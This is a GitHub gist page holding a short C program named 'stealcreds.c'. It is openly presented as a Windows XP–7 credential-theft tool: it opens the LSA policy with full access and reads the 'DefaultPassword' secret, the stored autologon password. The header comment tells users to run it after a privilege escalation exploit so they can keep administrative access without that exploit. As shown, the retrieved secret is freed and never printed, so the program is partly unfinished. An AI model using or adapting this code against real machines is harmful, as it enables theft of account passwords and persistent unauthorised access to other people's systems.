Skip to content

Instantly share code, notes, and snippets.

@danzek

danzek/stealcreds.c

Created October 19, 2017 15:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save danzek/e6331f669b2c9b7de21e1b0df5538995 to your computer and use it in GitHub Desktop.
Save danzek/e6331f669b2c9b7de21e1b0df5538995 to your computer and use it in GitHub Desktop.
Download ZIP
LsaRetrievePrivateData User Credential Theft on Windows XP-7
Raw
stealcreds.c
/*
* LsaRetrievePrivateData User Credential Theft on Windows XP-7
* ============================================================
*
* Requires admin privileges to run effectively (use privilege escalation
* exploit first then use this to get password so you are no longer dependent
* on the exploit)
*
* Seen on reddit: https://www.reddit.com/r/Malware/comments/779v21/til_you_can_maintain_administrative_access/
* Code from pastebin dump: https://pastebin.com/u992uP5e
*/
#include <Windows.h>
#include <stdio.h>
#include <NTSecAPI.h>
int wmain(void)
{
NTSTATUS Status = 0;
DWORD dwError = 0;
LSA_UNICODE_STRING uString;
PLSA_UNICODE_STRING Data;
LSA_OBJECT_ATTRIBUTES Attributes;
RtlZeroMemory(&Attributes, sizeof(Attributes));
LSA_HANDLE hHandle;
LPCWSTR lpPassword = L"DefaultPassword";
Status = LsaOpenPolicy(NULL, &Attributes, POLICY_ALL_ACCESS, &hHandle);
if (Status != ERROR_SUCCESS)
goto FAILURE;
uString.Buffer = (PWSTR)lpPassword;
uString.Length = wcslen(lpPassword) * sizeof(WCHAR);
uString.MaximumLength = uString.Length + 1;
Status = LsaRetrievePrivateData(hHandle, &uString, &Data);
if (Status != ERROR_SUCCESS)
goto FAILURE;
if(Data)
LsaFreeMemory(Data);
if (hHandle)
LsaClose(hHandle);
return ERROR_SUCCESS;
FAILURE:
dwError = GetLastError();
if (Data)
LsaFreeMemory(Data);
if (hHandle)
LsaClose(hHandle);
//do things
printf("Operation failed: %ld\r\n", dwError);
return dwError;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment